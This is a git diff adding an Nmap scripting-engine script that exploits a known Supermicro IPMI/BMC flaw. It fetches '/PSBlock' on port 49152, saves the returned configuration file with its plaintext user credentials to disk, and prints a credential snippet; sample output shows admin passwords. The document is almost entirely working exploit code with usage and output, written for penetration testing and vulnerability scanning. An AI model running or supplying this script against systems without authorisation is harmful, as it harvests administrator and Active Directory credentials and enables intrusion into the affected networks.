diff options
Diffstat (limited to 'scripts/supermicro-ipmi-conf.nse')
-rw-r--r-- | scripts/supermicro-ipmi-conf.nse | 99 |
1 files changed, 99 insertions, 0 deletions
diff --git a/scripts/supermicro-ipmi-conf.nse b/scripts/supermicro-ipmi-conf.nse new file mode 100644 index 0000000..77e1b29 --- /dev/null +++ b/scripts/supermicro-ipmi-conf.nse @@ -0,0 +1,99 @@ +description = [[ +Attempts to download an unprotected configuration file containing plain-text +user credentials in vulnerable Supermicro Onboard IPMI controllers. + +The script connects to port 49152 and issues a request for "/PSBlock" to +download the file. This configuration file contains users with their passwords +in plain text. + +References: +* http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras/ +* https://community.rapid7.com/community/metasploit/blog/2013/07/02/a-penetration-testers-guide-to-ipmi +]] + +--- +-- @usage nmap -p49152 --script supermicro-ipmi-conf <target> +-- +-- @output +-- PORT STATE SERVICE REASON +-- 49152/tcp open unknown syn-ack +-- | supermicro-ipmi-conf: +-- | VULNERABLE: +-- | Supermicro IPMI/BMC configuration file disclosure +-- | State: VULNERABLE (Exploitable) +-- | Description: +-- | Some Supermicro IPMI/BMC controllers allow attackers to download +-- | a configuration file containing plain text user credentials. This credentials may be used to log in to the administrative interface and the +-- | network's Active Directory. +-- | Disclosure date: 2014-06-19 +-- | Extra information: +-- | Snippet from configuration file: +-- | .............31spring.............\x14..............\x01\x01\x01.\x01......\x01ADMIN...........ThIsIsApAsSwOrD.............T.T............\x01\x01\x01.\x01......\x01ipmi............w00t!.............\x14............. +-- | Configuration file saved to 'xxx.xxx.xxx.xxx_bmc.conf' +-- | +-- | References: +-- |_ http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras/ +-- +-- @args supermicro-ipmi-conf.out Output file to store configuration file. Default: <ip>_bmc.conf +--- + +author = "Paulino Calderon <calderon () websec mx>" +license = "Same as Nmap--See https://nmap.org/book/man-legal.html" +categories = {"exploit","vuln"} + +local http = require "http" +local io = require "io" +local shortport = require "shortport" +local string = require "string" +local vulns = require "vulns" +local stdnse = require "stdnse" + +portrule = shortport.portnumber(49152, "tcp") + +--- +--Writes string to file +local function write_file(filename, contents) + local f, err = io.open(filename, "w") + if not f then + return f, err + end + f:write(contents) + f:close() + return true +end + +action = function(host, port) + local fw = stdnse.get_script_args(SCRIPT_NAME..".out") or host.ip.."_bmc.conf" + local vuln = { + title = 'Supermicro IPMI/BMC configuration file disclosure', + state = vulns.STATE.NOT_VULN, + description = [[ +Some Supermicro IPMI/BMC controllers allow attackers to download + a configuration file containing plain text user credentials. This credentials may be used to log in to the administrative interface and the +network's Active Directory.]], + references = { + 'http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras/', + }, + dates = { + disclosure = {year = '2014', month = '06', day = '19'}, + }, + } + + local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port) + local open_session = http.get(host, port, "/PSBlock") + if open_session and open_session.status ==200 and string.len(open_session.body)>200 then + local s = open_session.body:gsub("%z", ".") + vuln.state = vulns.STATE.EXPLOIT + local status, err = write_file(fw,s) + local extra_info + if status then + extra_info = string.format("\nConfiguration file saved to '%s'\n", fw) + else + extra_info = '' + stdnse.debug(1, "Error saving configuration file to '%s': %s\n", fw, err) + end + + vuln.extra_info = "Snippet from configuration file:\n"..string.sub(s, 25, 200)..extra_info + end + return vuln_report:make_output(vuln) +end |